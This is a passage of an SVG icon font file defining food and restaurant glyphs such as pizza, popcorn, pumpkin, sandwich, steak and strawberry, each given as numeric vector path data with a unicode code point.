14-28 29-41 43z m41 72c-14 15-28 30-42 45-13-15-26-29-39-43 14-15 28-30 41-44 13 14 27 29 40 42z m-149-42c13 14 27 29 40 42-13 15-27 30-41 44-13-14-27-28-40-42 14-15 28-30 41-44z m-41 158c13-14 27-29 40-42 14 15 28 29 41 44-13 14-26 28-40 42l-41-44z m109 2c14-15 28-30 41-44 13 14 27 28 40 42-14 15-28 30-40 44-14-15-28-29-41-42z m149 41c-14-14-28-29-42-43 14-14 28-29 41-43 13 14 27 29 40 43-13 15-27 30-39 43z m-124-217c-13 14-27 29-40 44-13-14-26-28-39-41 15-15 28-30 41-43 12 13 26 28 38 40z m109 1c-13 14-27 29-39 42-14-14-27-29-40-43 13-13 26-28 39-42 13 14 27 29 40 43z m-40 73c13 15 27 29 39 42-13 14-27 29-39 43-13-14-27-29-40-43 13-13 27-28 40-42z m-148 43c14-14 27-29 41-43 12 14 26 28 39 42-13 14-27 29-40 44-13-14-27-29-40-43z m149 158c-14-14-27-29-40-43 13-14 26-28 39-42 13 15 27 29 40 43-13 14-27 29-39 42z m-149-43l39-42c14 14 28 29 40 42-13 14-27 29-39 42-13-13-27-28-40-42z m-7-353c29-27 68-24 87 5-14 15-28 30-41 44-15-16-30-33-46-49z m115 4c23-28 57-30 86-5-16 17-32 34-45 48-13-13-27-28-41-43z m-177 162c-27-24-30-64-5-94 16 17 31 33 46 50-13 14-27 28-41 44z m325 0c-14-15-27-29-41-43 16-17 32-34 47-51 25 35 22 76-6 94z m-324 144c14 14 27 29 39 42-15 17-31 33-46 50-24-30-21-72 7-92z m330 92c-16-16-31-33-46-49 13-14 27-28 41-44 27 26 29 72 5 93z m-331-208c14 16 28 30 40 43-13 14-27 29-41 44-30-20-27-70 1-87z m327 87c-14-15-28-30-41-44 13-13 26-28 40-43 28 16 31 67 1 87z m-263 195c16-17 32-33 46-49 12 14 26 29 40 43-22 27-61 30-86 6z m113-6c14-15 27-29 40-43 15 15 30 32 46 48-29 25-70 22-86-5z m172 182c-43-12-85-23-127-35-2-1-5-1-5 0s1 2 3 4l130 110c2 2 3 3 3 4 0 0-3 0-5-1-43-12-87-24-132-37-3 0-4 1-3 3 30 52 59 102 88 153 1 2 1 3 1 4 0 0-2-1-4-3-44-38-88-76-132-114-2-1-5-1-7 0-44 39-88 76-132 114-2 2-4 3-4 2 0 0 0-2 1-4 29-50 58-100 88-152 1-2 0-3-3-3-45 13-88 25-131 37-2 1-4 1-5 1s1-3 3-4l132-112c2-2 3-3 3-4 0 0-3 0-5 1-43 12-85 24-127 36-3 0-3 0-1-2 61-52 122-104 182-155 2-1 5-1 7 0 60 51 121 103 183 155 2 2 1 3-1 2z" />
<glyph glyph-name="pizza-slice" horiz-adv-x="1000" unicode="&#xeb84;" d="M803 638c-57-266-242-475-479-573l48-128c281 114 500 362 566 678l-135 23z m-38 6l-702 119 246-663c225 93 401 291 456 544z m-107-46c8 44 43-3 39-31-8-44-43 3-39 31z m-402-26c-24 0-44 20-44 44 0 24 20 44 44 44 24 0 44-20 44-44 0-24-20-44-44-44z m87-127c-8-44-44 2-40 31 8 44 44-2 40-31z m115-105c-5-29-32-48-60-43-28 5-47 32-42 60 5 28 32 47 60 42 28-5 47-31 42-59z m47 222c-10-26-20-52-40-73-12-12-28-4-35 9-8 14-8 35 4 47 12 13 18 31 24 47 5 14 19 25 33 15 14-9 20-30 14-45z m24-79c4 28 31 47 59 42 28-4 47-31 42-59-4-28-31-47-59-43-28 5-47 32-42 60z" />
<glyph glyph-name="pizza" horiz-adv-x="1000" unicode="&#xeb85;" d="M542 692c-58 9-115 4-167-13l109-294 203 245c-42 31-91 52-145 62z m-88-81c-6-4-9 6-10 10-3 9-4 19-5 28 0 4 0 15 6 16 7 1 9-10 9-15 1-6 1-13 3-20 2-5 2-15-3-19z m48-143c-13 2-21 14-19 27 2 13 14 21 27 19 12-2 21-14 19-27-2-13-14-21-27-19z m43 117c-3-19-21-32-40-29-19 4-32 22-29 41 4 19 22 32 41 28 19-3 32-21 28-40z m11 66c-4-20-14 5-12 14 3 20 13-5 12-14z m53-65c-13 2-21 14-19 27 2 13 14 21 27 19 12-2 21-14 19-27-2-12-14-21-27-19z m232-277l61-11c19 144-37 282-140 372l-39-47c86-77 134-193 118-314z m36-69c-26-120-109-214-216-258l22-58c126 52 225 164 254 306l-60 10z m-750 158l-61 11c-18-142 36-278 135-368l40 48c-83 76-129 190-114 309z m297-400c-60 11-115 36-160 71l-39-48c53-42 117-71 189-83 69-12 137-6 199 14l-21 58c-53-17-110-21-168-12z m120 711c58-10 111-34 155-67l39 48c-52 40-114 68-183 79-72 12-142 6-206-16l21-58c55 18 114 24 174 14z m-203-25l-21 58c-124-53-220-163-249-303l61-10c25 117 106 210 209 255z m370-74l-203-245 316-53c15 115-31 226-113 298z m-27-102c3 19 21 32 40 28s32-21 29-40c-3-19-21-32-40-29-19 3-32 22-29 41z m-61-119c-13 2-22 14-19 26 2 13 14 22 26 19 13-2 22-14 19-26-2-13-14-22-26-19z m95 7c-4-10-11-18-21-23-13-8-19 22-8 29 6 3 10 8 13 14 3 6 10 6 14 1 5-6 6-14 2-21z m43-42c-13 2-21 14-19 27s14 21 27 19c12-2 21-14 19-27-3-12-14-21-27-19z m-176-328l-111 298-200-241c43-34 95-58 153-67 55-10 108-5 158 10z m-63 33c3 20 12-6 11-14-4-20-13 6-11 14z m-63 169c13-2 21-14 19-26-2-13-14-22-27-20-12 3-21 15-19 27 2 13 14 21 27 19z m9-90c-3-14-10 15-9 21 3 15 10-15 9-21z m-122-51c-13 2-22 14-19 27 2 12 14 21 27 19 12-2 21-15 19-27-3-13-15-21-27-19z m64 63c-3-20-18 3-16 14 4 20 18-2 16-14z m5-63c4 19 22 31 41 28 19-3 32-21 29-40-4-19-22-32-41-29-19 3-32 22-29 41z m-266 339l306-52-109 293c-97-43-173-130-197-241z m46 30c-3-20-15 4-13 14 3 20 15-4 13-14z m127 68c4 20 19-2 17-14-4-20-19 2-17 14z m60-82c-2-13-14-21-27-19-12 2-21 14-19 27 3 12 15 21 27 19 13-2 21-14 19-27z m-52 180c13-3 21-15 19-27-2-13-14-21-27-19-12 2-21 14-19 26 2 13 14 22 27 20z m-53-80c20-4 32-22 29-41-3-19-21-32-40-28-19 3-32 21-29 40 3 19 21 32 40 29z m-26-439l199 241-306 52c-14-113 29-221 107-293z m-23 156c-2-14-9 15-8 21 2 14 9-15 8-21z m49 47c3 19 21 32 40 29 19-3 32-21 28-40-3-19-21-32-40-29-19 3-32 21-28 40z m-21-98c13-2 22-14 19-27-2-12-14-21-26-19-13 2-22 14-19 27 2 13 14 21 26 19z m-45 149c12-2 21-14 19-27-2-13-15-21-27-19-13 2-21 14-19 27 2 13 14 21 27 19z m649-114l-317 54 111-299c102 42 181 131 206 245z m-48-21c3 20 19-1 17-14-3-20-19 2-17 14z m-160-55c3 20 20-1 18-14-4-20-20 1-18 14z m-11 23c-19 3-32 21-29 40s22 32 41 28c19-3 32-21 28-40-3-19-21-32-40-28z m46-140c-2-14-9 15-8 21 2 15 9-15 8-21z m8 37c-13 2-22 14-19 27 2 12 14 21 26 19 13-2 22-15 19-27-2-13-14-21-26-19z m48 119c-5-12-9-24-18-33-6-5-13-1-16 4-4 7-3 16 2 22 5 5 8 13 11 21 2 6 8 11 15 6 6-4 8-13 6-20z m10-35c2 12 15 21 27 19s21-15 19-27c-2-13-14-22-27-19-12 2-21 14-19 27z" />
<glyph glyph-name="plant" horiz-adv-x="1000" unicode="&#xeb86;" d="M513 172c-1 43-2 86-3 128 0 13 0 15-10 14-9 1-9-1-10-14 0-42-1-85-3-128-26 77-70 134-144 160 84-125 141-261 141-420h32c1 159 57 295 142 420-74-26-119-83-145-160z m-119 203c10-21 23-38 41-51 11-7 22-12 34-8 30 9 41 42 23 71-10 17-24 30-41 40-25 15-53 24-83 31 5-19 9-35 14-50 3-11 8-22 12-33z m103 53c-14-26-1-50 19-61 16-10 30-3 44 7 18 13 30 30 40 51 11 25 19 51 24 79-28-3-74-22-95-39-13-10-24-22-32-37z m-22 199c18 0 29 10 34 29 4 18 4 35 0 52-7 29-20 54-35 80-16-27-29-54-36-85-3-16-3-32 2-48 5-19 16-28 35-28z m23-97c-5-8-8-18-6-28 6-24 28-36 48-25 9 4 17 11 24 19 23 26 31 61 40 97-25-6-48-14-69-26-15-8-28-20-37-37z m-41-102c13-8 25-2 35 10 10 11 13 24 6 38-3 8-8 16-14 22-25 29-59 37-95 48 8-37 17-70 39-97 8-9 18-16 29-21z m1 95c12-7 25-4 35 8 10 11 12 24 4 37-5 9-12 19-20 26-22 18-47 25-74 32 6-29 13-57 29-79 7-9 17-17 26-24z m37 91c-6-13-5-24 4-34 10-12 20-16 33-10 17 7 29 20 37 38 9 20 15 41 23 62l-3 3c-29-8-57-15-79-38-6-6-11-14-15-21z" />
<glyph glyph-name="popcorn" horiz-adv-x="1000" unicode="&#xeb87;" d="M513 250c-10 0-20-5-28-12-15-12-25-35-25-61 0-26 11-49 27-62 7-6 16-10 26-10 10 0 19 4 27 10 16 13 26 36 26 63 0 24-9 45-22 59-9 8-19 13-31 13z m226 240c-6 11-18 17-31 16 2 19-12 37-33 42 18 16 17 44-4 59 25 23 20 61-11 77s-70 2-79-29c-5 1-10 2-15 2 12 10 14 26 5 38 23 10 32 36 18 57-13 20-42 25-62 11-18 28-60 33-85 10-25-23-20-61 11-77-8-10-10-22-7-33-7 0-14-2-20-6-11 22-39 30-61 18-22-12-28-39-13-58-20-11-31-33-25-54-29 8-59-7-68-34-8-26 9-54 38-61-1-3-1-5-2-8l-6 0 75-547h298l75 547h0c7 9 8 21 2 30z m-161 158l8-2 2 7c8 27 42 40 68 26s32-48 10-68l-6-5c3-2 5-3 7-5 19-14 18-40-3-53-7 0-14-2-21-5-10 0-20 4-26 11l-6 6-5-6c-8-8-21-10-31-5-10 6-15 17-11 27l3 8-8 1c-21 4-34 23-29 42 7 19 29 29 48 21z m-119 43l5 6-7 4c-27 14-31 48-10 68s58 15 74-9l4-7 6 5c17 11 41 7 52-10 11-17 4-38-15-47-3-1-5-2-8-3l5-6c7-10 5-22-4-30-8-7-21-7-30-1l-7 4c-1-2-3-5-4-7-8-16-28-23-45-17-3 10-11 17-21 20-4 10-2 22 5 30z m-103-80l7 4-5 6c-13 16-8 38 11 48 18 10 42 3 51-14 1-3 2-5 3-7l7 4c10 6 23 5 31-2 9-8 10-20 3-29l-5-6 8-4c19-8 26-30 16-46-11-17-36-22-53-10l-6 4-4-6c-1-1-2-2-2-3-17 21-51 21-69 1-4 4-8 7-14 9-7 19 2 41 21 51z m54-152l-107 1c0 2 1 3 1 5l3 7-8 2c-29 7-43 38-28 63s52 29 74 9c1-2 3-4 5-6l5 6c13 15 38 17 53 3 16-13 15-36-1-48-3-2-5-4-7-5l7-6c10-7 11-21 3-31z m1 37c15 11 20 31 11 48 2 1 3 3 4 5 21-14 50-8 63 12 13 20 4 46-19 56 4 5 6 11 6 17 20-6 42 3 51 21 4-3 8-4 14-5-15-9-22-25-18-41 4-15 18-27 35-30-5-13 0-28 14-35s30-4 40 6c6-6 14-11 23-13-9-8-14-21-12-33-23 0-42-12-51-31-4 5-9 9-15 12 15 19 10 46-12 58s-51 4-61-17c-13 8-30 6-41-4-11-10-12-25-3-37-8-3-13-7-18-13 1 9-3 18-11 24z m32-17l7 4-4 6c-7 9-6 21 2 29 9 7 22 8 32 2l7-4c1 2 2 4 3 7 9 17 33 24 51 14 18-10 23-32 10-48l-4-6 7-4c6-3 12-8 16-14-1-2-1-4-1-6h1l-7-1h-93l-46 1c3 9 10 16 19 20z m109-391l-4-135h-71l-2 135c-23 18-38 51-38 89 0 37 14 70 35 88l-2 188h93l-6-191c20-18 33-49 33-85-1-38-16-71-38-89z m175 372l-151-1c2 22 22 39 47 39h8c-1 2-1 5-1 7-3 19 14 37 35 37 21 0 38-17 36-36l0-8c2 1 5 1 8 1 11 1 21-5 25-14 4-9 1-19-7-25z" />
<glyph glyph-name="potato" horiz-adv-x="1000" unicode="&#xeb88;" d="M920 360c-30 38-59 77-87 117-14 18-27 36-47 43-25 10-51 18-78 27 2-14 4-25 5-36 1-11 3-22 3-33 1-11 0-22 0-33-1 0-2 0-3 0-1 7-2 13-2 20-2 26-8 50-17 73-5 11-12 17-22 20-105 33-211 45-318 22-20-4-40-10-60-16 10-35 17-69 16-104-2 6-3 11-5 17-7 23-13 46-20 69-4 11-11 18-21 15-59-13-100-55-131-114 17-23 21-50 16-79-1 8-2 16-4 23-5 12-10 24-16 35-4 7-10 7-15 0-12-17-27-34-37-53-24-45-18-91 20-120 32-25 68-45 103-65 12-7 26-9 40-10 49-4 99-6 149-10 29-3 58-10 85-27 48-32 101-39 154-29 40 8 80 20 120 30 19 5 38 11 57 15 63 13 102 58 127 125 10 29 7 55-12 78z m-453 9c-24-10-50-4-57 14-8 19 5 42 29 52 23 11 49 4 57-14 8-18-5-41-29-52z m117-116c-10-19-24-33-43-37-15-3-23 8-21 25 3 24 33 52 52 49 12-1 17-8 16-24 0-2-1-8-4-13z m136 1c-5-12-13-23-25-26-5-1-13 0-16 4-3 4-3 14-1 19 6 14 17 22 28 25 11-1 18-11 14-22z" />
<glyph glyph-name="pumpkin" horiz-adv-x="1000" unicode="&#xeb89;" d="M937 405c-1 93-76 157-203 173-22 3-43 5-65 4-10 0-20 2-33-3 96-35 115-99 124-166 11-88 15-175-10-262-13-47-36-90-75-129-7-7-13-15-30-20 21 32 38 63 48 95 26 88 31 177 25 266-2 41-1 82-20 121-25 51-66 89-143 103-10 2-21 4-31 4 115-446-38-595-38-595-81 185-5 572 0 595-67-6-129-37-156-83-32-53-45-110-50-168-8-109-1-216 60-318 1-2 0-4-1-9-42 38-66 80-79 125-33 108-28 217-2 326 12 48 44 89 112 112-102 16-275-27-302-133-1-4-4-8-5-11v-123c7-36 13-72 23-108 16-60 42-118 91-169 59-61 139-95 244-95 14 1 28-1 39-8h57c16 9 34 10 53 9 108-3 190 30 250 93 57 59 83 126 99 196 15 59 20 118 18 178z m-558 191c14 0 27-5 41 1 50 21 103 24 154 8 36-12 69-1 104 0-38 26-79 43-124 45-16 0-24 5-27 25-6 32-3 64 2 95h-63c-3-32-17-61-23-92-4-19-13-27-33-30-40-7-79-18-116-52 32 0 59 0 85 0z" />
<glyph glyph-name="raddish" horiz-adv-x="1000" unicode="&#xeb8a;" d="M739-65c-50 6-96 21-132 56-39 38-63 85-74 139-6 29 2 52 28 72 85 63 118 174 74 271-41 91-124 132-228 104-12-4-24-8-37-11-17 77-27 156-76 222-3-3-6-4-8-6-1-1-3-3-5-5 30-51 44-106 56-165-18 42-36 81-54 120-7 16-11 16-26 4 18-41 36-83 54-124l-5-3c-31 54-63 107-94 161-6-6-16-9-9-22 19-35 38-70 56-105 10-19 20-38 31-59-5 5-9 8-12 13-22 33-45 66-66 101-7 11-13 11-24 4 30-63 67-120 116-167-22-19-44-35-62-54-75-77-82-182-14-259 51-59 119-82 200-74 44 4 61-6 77-46 10-23 19-48 32-70 37-64 93-106 172-113 32-3 64-4 95-6 48-3-42 19-65 22z" />
<glyph glyph-name="restaurant-menu" horiz-adv-x="1000" unicode="&#xeb8b;" d="M508 661v-623h372v623h-372z m309-475h-247v18h247v-18z m0 64h-247v18h247v-18z m0 64h-247v17h247v-17z m0 59h-247v17h247v-17z m0 63h-247v18h247v-18z m0 60h-247v18h247v-18z m-309 218v-22h405v-677h-405v-29h430v728h-430z m-388-676h373v623h-373v-623z m212 442c1 15 13 27 28 27 9 0 17-7 17-16v-221c0-8-7-14-14-14h-11c-4 0-7 2-10 4-2 3-3 6-3 10l2 84h0c-5 0-9 2-13 6-3 3-4 8-4 13l8 107z m-96 22c0 3 2 5 5 5h1c3 0 5-2 5-5v-47c0-4 4-8 8-8h1c4 0 8 4 8 8v47c0 3 2 5 4 5h2c2 0 4-2 4-5v-47c0-4 4-8 8-8h1c5 0 8 4 8 8v47c0 3 2 5 5 5h1c3 0 5-2 5-5v-71c0-9-7-16-16-16h-3l4-145c0-4-1-7-3-10-3-2-6-4-10-4h-11c-3 0-7 2-9 4-3 3-4 6-4 10l5 145h-2c-9 0-17 7-17 16l0 71z m-173-516h430v29h-406v677h406v22h-430v-728z" />
<glyph glyph-name="restaurant" horiz-adv-x="1000" unicode="&#xeb8c;" d="M921-9c2 15 2 30 2 45 0 221-174 402-396 416 1 2 1 3 1 5 0 16-13 28-28 28-15 0-28-12-28-28 0-2 0-3 1-5-221-14-396-195-396-416 0-15 1-30 2-45h842z m-758 150c13 76 51 135 89 148l6-32c-37-18-70-74-83-145-3-17-5-33-5-49l-12 4c-1 23 0 48 5 74z m766-172h-858c-5 0-8-4-8-9v-26c0-5 4-9 8-9h858c5 0 9 4 9 9v26c0 5-4 9-9 9z m-441 675c-22-22-21-59 2-77 6-5 13-7 19-1 6 7 5 13-1 19-14 16-14 28 2 43 25 25 24 55-2 81-5 5-9 14-9 21 0 7 6 13 9 21 2 4 4 10 3 14-1 4-6 6-10 10-5-3-9-5-12-8-23-20-23-53 0-76 18-19 18-29-1-47z m-83-47c-2-6-7-11-11-15-20-21-22-51-3-72 4-4 9-7 15-11 4 3 10 6 11 9 0 5-1 12-4 16-12 14-12 29 1 41 27 26 27 55 0 82-8 7-12 16-9 26 1 6 5 11 9 16 6 7 6 14 0 18-4 3-11 1-17 1-2-1-5-4-6-6-19-22-18-52 5-73 9-10 15-20 9-32z m178-14c-10-10-16-23-16-38 0-15 5-28 16-39 7-6 14-8 20-1 6 6 5 13-1 19-13 15-13 28 1 42 26 26 26 54 0 81-14 13-14 27-2 40 6 7 8 14 2 21-5 5-13 4-21-3-21-20-21-54 1-76 18-17 18-29 0-46z" />
<glyph glyph-name="salt-and-pepper" horiz-adv-x="1000" unicode="&#xeb8d;" d="M581 68c36 1 71 0 106 0l53 0s34 0 52 0c8 0 12 3 16 9 27 46 29 93 5 141-9 19-21 37-28 57-7 24-12 50-16 75-6 49-5 98 5 146 3 15 9 29 13 43 4 15 1 19-14 19h-171c-15 0-19-5-15-20 3-9 8-18 10-28 9-33 12-68 11-102-1-66-9-129-45-187-28-47-25-97 4-145 3-6 8-8 14-8z m-342 302c29-1 58 0 86 0 30 0 59-1 89 0 4 0 9 3 12 6 19 25 18 56-3 81-42 52-145 54-191 4-23-26-26-58-6-84 3-4 8-7 13-7z m361 244c22 0 43 0 65 0h43c22 0 43 0 65 0 8-1 12 2 16 9 19 29 13 65-16 89-44 37-121 39-167 4-34-25-41-63-20-95 4-5 8-7 14-7z m-157-471c-9 40-16 81-12 122l6 31c2 13-4 18-16 18-63 0-126 0-189 0-13 0-18-5-17-18 0-5 2-11 3-16 1-12 4-24 4-36-1-47-10-93-22-138-9-32-19-64-27-96-6-29-4-58 9-85 4-9 9-12 19-12 41 0 83 0 125 0h119c20 0 22 1 29 21 11 31 9 63 1 95-10 38-23 75-32 114z m16-197c-3-11-7-16-20-15-76 0-153 0-229 0-10 0-14 3-16 12-9 33-6 66 6 98 18 53 31 107 38 162 3 31 6 62-6 93h186c-16-85 7-165 32-244 10-35 19-69 9-106z m323 67c-63 0-127 0-190 0-4 0-9-3-12-6-20-25-20-57-2-83 4-6 8-8 15-8 16 0 31 0 47 0l47 0h24c23 0 47 0 71 0 4 0 9 2 11 4 21 24 22 64 0 88-2 3-7 5-11 5z m-2 41h-122c-23 0-45 0-67 0-9 0-15-4-15-13 0-9 6-13 14-14 2 0 5 0 7 0h180c4 0 7 0 11 1 7 1 10 6 10 13 1 7-3 11-10 13-2 0-5 0-8 0z m-548 301c-13 0-17-4-17-13s5-13 17-13h188c12 0 17 4 17 13 0 9-5 13-17 13h-188z m551 244c-32 0-63 0-95 0h-97c-9 0-15-4-15-13 0-9 5-14 14-14 65 0 130 0 194 0 11 0 17 8 14 17-2 8-8 10-15 10z m-109 152c9 1 18 0 26 0 10-1 18 5 18 15 0 1-1 3-1 5-4 10-15 16-29 17-13 0-26-7-30-16-4-12 4-22 16-21z m-262-642c-4 17-6 34-9 51-50 0-99 1-149 0-2 0-6-4-6-6-5-42-17-82-32-121-9-25-12-50-2-75 3-8 7-12 16-12 63 1 126 1 189 0 13 0 17 5 20 15 8 26 4 50-4 74-8 25-16 49-23 74z" />
<glyph glyph-name="sandwich" horiz-adv-x="1000" unicode="&#xeb8e;" d="M906 450c-13 8-19 16-17 31 2 22-8 35-30 42-92 33-185 67-277 100-13 4-31 4-44 0-77-27-154-55-231-83-25-10-50-16-77-15-18 0-38-3-56-7-47-11-85-32-80-98 1-9-5-20-11-27-26-27-28-66-1-91 16-15 21-30 21-51 0-41 13-64 53-77 31-9 64-10 96-16 7-2 16-5 18-10 10-25 29-42 54-49 37-10 76-17 113-25 38 7 74 12 109 21 25 7 46 22 60 45 5 9 14 18 23 21 72 27 144 53 216 79 52 18 52 18 51 74 0 12 3 21 14 30 38 30 37 79-4 106z m-757 23c31 18 66 19 101 20 14 0 28 1 40 5 86 30 170 62 256 92 7 3 17 4 24 1 92-32 185-66 277-99 1-1 2-2 6-5-56-21-110-40-164-60-34-12-68-24-102-36-9-3-15-6-16-18-2-20-18-32-35-36-29-8-59-17-89-18-33-1-66 6-99 10-10 1-20 7-29 12-29 15-33 33-18 58-30 0-61-2-92 1-20 2-41 8-60 17-28 14-27 40 0 56z m734-106c-28-11-59-16-88-21-12-2-23-2-31-13-4-5-10-9-16-11-17-5-29-14-36-32-9-20-23-17-40 6-31-17-62-34-94-51-2-1-6-2-8-5-15-33-47-36-77-41-11-2-19-5-25-15-17-25-39-24-57 1-5 8-15 14-23 17-29 10-59 19-88 28-5 2-11 4-14 8-16 21-40 19-62 25-21 5-42 12-55 32-2 5-11 6-17 8-13 6-28 11-41 18-12 7-18 18-13 36 38-48 90-53 143-53 12 0 17-5 24-15 11-15 25-32 41-40 83-36 167-36 250 0 18 7 29 28 44 42 6 5 12 12 20 14 75 28 151 55 227 83 16 6 31 17 47 26 15-16 14-36-11-47z" />
<glyph glyph-name="sausage" horiz-adv-x="1000" unicode="&#xeb8f;" d="M779 409c-28 0-57-7-85-24-15-9-32-17-50-24 2-9 4-18 7-27 4-14 9-29 13-43 2-7 0-13-4-17-5-6-13-9-21-9-9 0-17 3-20 12-7 23-15 46-20 69-30-8-62-14-94-16-12-25-18-52-20-79 0-12-13-19-25-19-9 0-17 3-21 10-1 2-2 5-2 9 1 17 4 34 8 50 2 10 5 20 9 29-30 2-60 7-88 15-15-20-24-43-33-65-4-10-14-14-23-14-7 0-14 2-19 6-5 4-8 10-5 17 4 10 8 20 12 30 2 3 3 6 4 9 2 4 4 7 6 11 4 8 9 15 14 23-12 5-23 11-33 18-24 15-52 22-80 22-48 0-96-19-122-50-21-24-28-51-23-77 2-15 8-29 17-42 11-16 26-31 45-43l3-2c101-63 222-91 344-91 147 0 295 41 410 109l1 0c16 10 28 20 37 31 8 11 13 23 15 34 13 66-66 138-157 138z m-370 36c18 16 24 35 19 58-6 26-27 48 1 68 17 12 0 41-17 28-21-15-36-34-31-61 5-24 27-49 4-70-16-14 8-38 24-23z m84 0c18 16 24 35 19 58-5 26-27 48 1 68 18 12 1 41-17 28-21-15-36-34-31-61 5-24 27-49 5-70-17-14 7-38 23-23z m85 0c18 16 24 35 19 58-6 26-27 48 1 68 17 12 0 41-17 28-21-15-36-34-31-61 5-24 27-49 4-70-16-14 8-38 24-23z" />
<glyph glyph-name="soft-drinks" horiz-adv-x="1000" unicode="&#xeb90;" d="M693 585c-107-1-215-2-323-4l-23 207-34-4 23-203c-11 0-22 0-32 0-54-1-67-14-60-67 13-103 25-205 37-308 9-80 16-161 26-241 4-39 18-52 58-52 44-1 88 0 133 0v0c42 0 84 0 126 0 50-1 66 15 72 65 20 179 40 358 60 537 6 53-8 71-63 70z m-401-233c-7 60-13 117-20 175-2 22 7 28 27 28h40l22-203h-69z m208-418c-79 0-144 5-144 12 0 6 65 11 144 11 79 0 144-5 144-11s-65-12-144-12z m226 591c-8-56-13-113-19-173h-312l-22 203c109-1 217-1 326 0 21 0 31-5 27-30z" />
<glyph glyph-name="soup-bowl" horiz-adv-x="1000" unicode="&#xeb91;" d="M926 327h-852c-7 0-12-6-11-13 0-7 1-13 2-20 1-7 8-12 15-12h840c6 0 13 5 14 12 1 7 2 13 3 20 1 7-4 13-11 13z m-432 52c96 126-40 198 0 323-74-143 58-165 0-323z m68 45c69 91-29 143 0 233-54-103 42-119 0-233z m-132 0c69 91-29 143 0 233-54-103 42-119 0-233z m483-170h-826c-7 0-11-5-9-12 18-61 50-117 91-163 5-6 14-10 21-10h620c7 0 16 4 21 10 41 46 73 102 91 163 2 7-2 12-9 12z m-695-212c-7 0-8-4-3-8 12-11 25-20 39-29 6-4 16-7 23-7h447c7 0 17 3 23 7 13 9 26 18 38 29 5 4 4 8-3 8l-564 0z" />
<glyph glyph-name="spoon-and-fork" horiz-adv-x="1000" unicode="&#xeb92;" d="M500 719c-204 0-369-165-369-369 0-147 86-273 210-332l12 223s-22 7-27 9c-46 20-79 80-79 158 0 84 65 157 129 158h0c64-1 129-74 129-158 0-78-33-138-79-158-1 0-27-10-27-10l13-248c28-7 58-11 88-11 41 0 81 7 117 20l12 221c-30 6-56 26-72 50-20 29 15 294 15 294h23v-248h23v248h25v-248h23v248h25v-248h23v248h18s35-265 15-295c-16-23-41-42-71-49 0 0-1-1-1-1l10-190c110 64 184 183 184 319 0 204-165 369-369 369z m-199-274c1 6 3 11 3 11 0 2-1 4-3 5-2 1-4 1-6-1 0 0-2-4-6-10-3-5-7-13-10-24-3-8-6-20-7-34-1-7-1-13-1-19 1-8 2-14 4-21 7-21 13-41 33-60 6-7 13-11 18-15l1-1c1 0 2-1 3-2 4-2 7-3 7-3 2 0 4 1 5 2 1 2 0 4-1 6 0 0-3 2-6 5-2 3-4 6-6 10-2 2-4 5-6 8-10 15-16 36-23 57-2 5-3 11-4 16 0 6-1 12-1 17 0 12 1 23 2 31 1 10 2 17 4 22z m199 343c-241 0-437-197-437-438 0-241 196-438 437-438 241 0 438 197 438 438 0 241-197 438-438 438z m0-843c-223 0-405 182-405 405s182 405 405 405 405-182 405-405-182-405-405-405z" />
<glyph glyph-name="steak" horiz-adv-x="1000" unicode="&#xeb93;" d="M921 152c-42-55-107-87-187-87-77 0-164 28-259 83-76 44-155 58-225 71-63 11-127 23-171 59-10 8-16 6-15-7 21-169 230-92 431-208 246-143 401-74 435 85 3 13-1 14-9 4z m-638 170c66-11 141-23 217-63 79-41 149-62 210-62 55 0 99 17 130 50 29 32 44 77 44 131 0 164-174 297-388 297-242 0-380-85-380-231 0-95 66-106 167-122z m54 265c61 0 110-38 110-85 0-47-49-84-110-84-60 0-109 37-109 84 0 47 49 85 109 85z m158-405c280-162 443-51 443 157 0 207-199 375-443 375s-432-87-432-295 220-114 432-237z m0 511c225 0 408-141 408-315 0-59-17-109-50-144-34-37-83-56-143-56-64 0-138 22-219 64-73 39-146 50-211 61-102 17-183 30-183 141 0 158 145 249 398 249z m-103-191c0-23-25-42-55-42s-54 19-54 42 24 42 54 42 55-19 55-42z" />
<glyph glyph-name="strawberry" horiz-adv-x="1000" unicode="&#xeb94;" d="M799 328c-3 32-9 64-25 93-25 44-66 65-113 77-52 14-105 16-158 16h-13c-56 0-111-3-165-20-61-18-102-56-117-119-16-69-10-137 19-202 31-67 74-125 126-176 30-29 63-55 101-73 28-13 56-16 85-3 14 7 28 13 40 22 75 49 131 115 174 192 34 60 54 123 46 193z m-535-40c-1-3-2-6-3-9 0-2-2-4-4-4-1 0-4 2-4 4-5 12-5 24 0 36 1 2 3 5 4 4 2-1 5-3 5-5 1-2 2-5 2-8 1-5 1-13 0-18z m8 109c-2 12 2 23 10 31 3 4 10 7 13 6 2-1 4-3 5-7 2-4 1-13-2-19-3-6-6-11-10-16-7-8-14-4-16 5z m33-231c-3-1-7 1-9 3-7 6-11 13-14 22-2 7-2 14-1 16 1 2 2 3 3 4 2 1 6-1 8-3 10-9 15-21 16-34 0-3-2-8-3-8z m40 120c-1-4-3-8-5-11-4-7-10-6-15 0-8 11-8 33 0 44 6 6 13 7 17-1 1-3 2-7 3-11 2-6 2-15 0-21z m261 155c5 9 11 10 18 3 6-6 9-13 11-21 1-7 1-17 0-22-1-3-2-6-3-8-4-9-11-9-18-3-11 11-15 38-8 51z m-239-17c2 6 5 12 8 18 7 10 17 8 21-4 5-16 2-31-8-45-2-4-8-7-12-6-4 0-7 6-9 10-1 2-2 4-2 7 0 3-1 7-2 7 0 0 2 6 4 13z m12-364c-1-2-4-2-7 0-11 7-17 18-19 31-1 6 3 9 8 5 7-4 12-10 15-16 4-7 6-17 3-20z m24 108c-2-4-4-8-10-10-6-3-14 5-17 17-2 11-3 23 0 34 2 10 12 12 18 2 3-5 6-11 8-17 2-7 4-19 1-26z m21 117c-2 7-2 18 0 25 2 5 3 10 5 14 5 10 14 10 21 1 10-14 10-42 0-55-6-9-15-10-20-1-2 5-4 10-6 16z m27-305c-2-1-3-1-4-1-6 5-11 11-15 17-1 0 3 6 6 6 4 1 8-3 12-8 4-6 3-13 1-14z m12 85c-3-6-6-9-10-10-7 0-15 9-16 20 0 7 1 16 3 23 3 8 11 9 16 2 2-3 4-7 6-11 2-6 4-17 1-24z m48-83c-1-3-5-6-8-6-2-1-6 3-8 6-1 2-2 5-2 7-1 4-2 13 1 19 2 5 5 8 9 9 6 0 11-9 11-21 0-4-1-9-3-14z m3 193c-1-4-2-8-4-12-5-9-14-9-20-1-8 12-8 37 0 49 6 10 15 10 20 0 2-4 3-8 4-12 2-7 2-18 0-24z m0 228c-1-4-2-8-4-12-5-9-14-9-20 0-9 13-9 38-1 51 7 10 16 10 22-1 2-4 3-8 4-12 2-7 2-19-1-26z 